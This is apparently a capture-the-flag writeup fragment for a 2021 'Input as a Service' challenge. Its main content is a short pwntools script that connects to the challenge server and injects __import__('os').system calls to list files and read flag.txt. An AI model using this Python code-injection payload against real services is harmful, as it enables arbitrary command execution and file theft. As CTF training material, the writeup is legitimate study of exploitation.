Tags: misc 

Rating:

```
#!/usr/bin/env python3
# @author: codaholikid

from pwn import *

host = '138.68.147.93'
port = 31831

r = remote(host, port)
r.recvuntil('>>> \n')
r.sendline('__import__("os").system("ls")')
print(r.recv().decode().strip())
r.sendline('__import__("os").system("cat flag.txt")')
print(r.recv().decode().strip())

Original writeup (https://hackmd.io/@codaholikid/cyberapocalypse-ctf-2021#Second-Challenge-Input-as-a-Service).